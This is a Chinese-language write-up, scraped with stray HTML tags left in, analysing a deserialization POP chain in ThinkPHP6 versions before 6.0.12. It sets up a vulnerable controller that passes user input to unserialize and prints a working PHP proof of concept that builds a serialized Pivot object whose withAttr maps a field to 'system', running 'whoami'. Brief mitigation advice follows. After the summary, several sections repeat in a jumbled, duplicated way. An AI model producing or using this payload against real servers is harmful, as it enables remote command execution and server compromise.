ThinkPHP6 高版本反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本文详细分析ThinkPHP6框架中存在的反序列化漏洞，该漏洞影响ThinkPHP6.0.12以下版本。攻击者可以通过精心构造的反序列化数据触发框架中的POP链，最终实现任意命令执行。<\/p>

环境搭建<\/h2>

安装TP6.0.x版本：<\/li> <\/ol>

composer create-project topthink\/think=<\/span>6.0.x tp6.0.9
<\/span><\/span><\/code><\/pre>
修改入口文件\/app\/controller\/index.php<\/code>：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> app\controller<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> Index<\/span> {
<\/span><\/span>    public<\/span> function<\/span> index<\/span>($input =<\/span> ''<\/span>) {
<\/span><\/span>        echo<\/span> $input;
<\/span><\/span>        unserialize<\/span>($input);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>POP链构建分析<\/h2>
反序列化入口点<\/h3>
在ThinkPHP6中，反序列化的入口点通常从__destruct()<\/code>或__wakeup()<\/code>方法开始。我们找到的关键类是think\model\Pivot<\/code>，它是think\Model<\/code>的子类。<\/p>
前半链：触发toString<\/h3>

Model类<\/strong>的__destruct()<\/code>方法会调用save()<\/code>方法：<\/li>
<\/ol>
public<\/span> function<\/span> __destruct()
<\/span><\/span>{
<\/span><\/span>    if<\/span> ($this-><\/span>lazySave<\/span>) {
<\/span><\/span>        $this-><\/span>save<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>

save()方法<\/strong>需要满足以下条件：<\/p>

$this->isEmpty()<\/code>返回false → $this->data<\/code>不为空<\/li>
$this->trigger('BeforeWrite')<\/code>返回true → $this->withEvent<\/code>为false<\/li>
$this->exists<\/code>为true → 调用updateData()<\/code><\/li>
<\/ul>
<\/li>

updateData()方法<\/strong>：<\/p>

需要$this->force<\/code>为true → 直接返回$this->data<\/code><\/li>
调用$this->checkAllowFields()<\/code><\/li>
<\/ul>
<\/li>

checkAllowFields()方法<\/strong>：<\/p>

当$this->field<\/code>和$this->schema<\/code>都为空时，会执行else分支<\/li>
调用$this->db()<\/code>方法<\/li>
<\/ul>
<\/li>

db()方法<\/strong>：<\/p>

包含字符串拼接$this->table . $this->suffix<\/code><\/li>
当$this->table<\/code>为对象时，会触发其__toString()<\/code>方法<\/li>
<\/ul>
<\/li>
<\/ol>
前半链必要条件<\/h3>

$this->data<\/code>不为空<\/li>
$this->lazySave<\/code>为true<\/li>
$this->withEvent<\/code>为false<\/li>
$this->exists<\/code>为true<\/li>
$this->force<\/code>为true<\/li>
<\/ul>
后半链：触发RCE<\/h3>

toString()方法<\/strong>位于Conversion<\/code> trait中：<\/li>
<\/ol>
public<\/span> function<\/span> __toString()
<\/span><\/span>{
<\/span><\/span>    return<\/span> $this-><\/span>toJson<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
toJson()方法<\/strong>调用toArray()<\/code>：<\/li>
<\/ol>
public<\/span> function<\/span> toJson<\/span>(int<\/span> $options =<\/span> JSON_UNESCAPED_UNICODE<\/span>):<\/span> string<\/span>
<\/span><\/span>{
<\/span><\/span>    return<\/span> json_encode<\/span>($this-><\/span>toArray<\/span>(), $options);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>

toArray()方法<\/strong>：<\/p>

遍历$this->data<\/code>的键名<\/li>
当$this->visible[$key]<\/code>存在时，调用getAttr($key)<\/code><\/li>
<\/ul>
<\/li>

getAttr()方法<\/strong>：<\/p>

调用getData($name)<\/code>获取值<\/li>
最终调用getValue($name, $value, $relation)<\/code><\/li>
<\/ul>
<\/li>

getValue()方法<\/strong>的关键利用点：<\/p>
<\/li>
<\/ol>
if<\/span> (isset<\/span>($this-><\/span>withAttr<\/span>[$fieldName])) {
<\/span><\/span>    $closure =<\/span> $this-><\/span>withAttr<\/span>[$fieldName];
<\/span><\/span>    $value =<\/span> $closure($value, $this-><\/span>data<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
当$this->withAttr[$fieldName]<\/code>设置为系统函数名（如system<\/code>）时，可以实现任意命令执行<\/li>
<\/ul>
后半链必要条件<\/h3>

$this->table<\/code>设置为new think\model\Pivot()<\/code><\/li>
$this->data<\/code>设置为["key"=>"command"]<\/code>（命令参数）<\/li>
$this->visible<\/code>设置为["key"=>1]<\/code><\/li>
$this->withAttr<\/code>设置为["key"=>"system"]<\/code>（函数名）<\/li>
$this->strict<\/code>为true<\/li>
<\/ul>
POP链完整流程<\/h2>

__destruct()<\/code> → save()<\/code><\/li>
save()<\/code> → updateData()<\/code><\/li>
updateData()<\/code> → checkAllowFields()<\/code><\/li>
checkAllowFields()<\/code> → db()<\/code><\/li>
db()<\/code> → $this->table . $this->suffix<\/code>（字符串拼接）<\/li>
__toString()<\/code> → toJson()<\/code><\/li>
toJson()<\/code> → toArray()<\/code><\/li>
toArray()<\/code> → getAttr()<\/code><\/li>
getAttr()<\/code> → getValue()<\/code><\/li>
getValue()<\/code> → 执行$this->withAttr<\/code>中指定的函数<\/li>
<\/ol>
漏洞利用POC<\/h2>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> think\model\concern<\/span>;
<\/span><\/span>
<\/span><\/span>trait<\/span> Attribute<\/span> {
<\/span><\/span>    private<\/span> $data =<\/span> ['cyz'<\/span> =><\/span> 'whoami'<\/span>];
<\/span><\/span>    private<\/span> $withAttr =<\/span> ['cyz'<\/span> =><\/span> 'system'<\/span>];
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>trait<\/span> ModelEvent<\/span> {
<\/span><\/span>    protected<\/span> $withEvent =<\/span> true<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think<\/span>;
<\/span><\/span>
<\/span><\/span>abstract<\/span> class<\/span> Model<\/span> {
<\/span><\/span>    use<\/span> model\concern\Attribute<\/span>;
<\/span><\/span>    use<\/span> model\concern\ModelEvent<\/span>;
<\/span><\/span>    
<\/span><\/span>    private<\/span> $exists;
<\/span><\/span>    private<\/span> $force;
<\/span><\/span>    private<\/span> $lazySave;
<\/span><\/span>    protected<\/span> $suffix;
<\/span><\/span>    
<\/span><\/span>    function<\/span> __construct($a =<\/span> ''<\/span>) {
<\/span><\/span>        $this-><\/span>exists<\/span> =<\/span> true<\/span>;
<\/span><\/span>        $this-><\/span>force<\/span> =<\/span> true<\/span>;
<\/span><\/span>        $this-><\/span>lazySave<\/span> =<\/span> true<\/span>;
<\/span><\/span>        $this-><\/span>withEvent<\/span> =<\/span> false<\/span>;
<\/span><\/span>        $this-><\/span>suffix<\/span> =<\/span> $a;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\model<\/span>;
<\/span><\/span>
<\/span><\/span>use<\/span> think\Model<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> Pivot<\/span> extends<\/span> Model<\/span> {}
<\/span><\/span>
<\/span><\/span>echo<\/span> urlencode<\/span>(serialize<\/span>(new<\/span> Pivot<\/span>(new<\/span> Pivot<\/span>())));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级ThinkPHP到6.0.12或更高版本<\/li>
避免反序列化用户可控的输入<\/li>
使用白名单机制限制反序列化的类<\/li>
<\/ol>
总结<\/h2>
该漏洞通过精心构造的反序列化数据，利用ThinkPHP6框架中的多个魔术方法和特性，构建了一条完整的POP链，最终实现了任意命令执行。理解这条POP链的构建过程对于分析其他PHP框架的反序列化漏洞也有很好的参考价值。<\/p>

ThinkPHP6 高版本反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2> 本文详细分析ThinkPHP6框架中存在的反序列化漏洞，该漏洞影响ThinkPHP6.0.12以下版本。攻击者可以通过精心构造的反序列化数据触发框架中的POP链，最终实现任意命令执行。<\/p>

POP链构建分析<\/h2>

反序列化入口点<\/h3> 在ThinkPHP6中，反序列化的入口点通常从__destruct()<\/code>或__wakeup()<\/code>方法开始。我们找到的关键类是think\model\Pivot<\/code>，它是think\Model<\/code>的子类。<\/p>

漏洞概述<\/h2>
本文详细分析ThinkPHP6框架中存在的反序列化漏洞，该漏洞影响ThinkPHP6.0.12以下版本。攻击者可以通过精心构造的反序列化数据触发框架中的POP链，最终实现任意命令执行。<\/p>

反序列化入口点<\/h3>
在ThinkPHP6中，反序列化的入口点通常从`destruct()<\/code>或wakeup()<\/code>方法开始。我们找到的关键类是think\model\Pivot<\/code>，它是think\Model<\/code>的子类。<\/p>`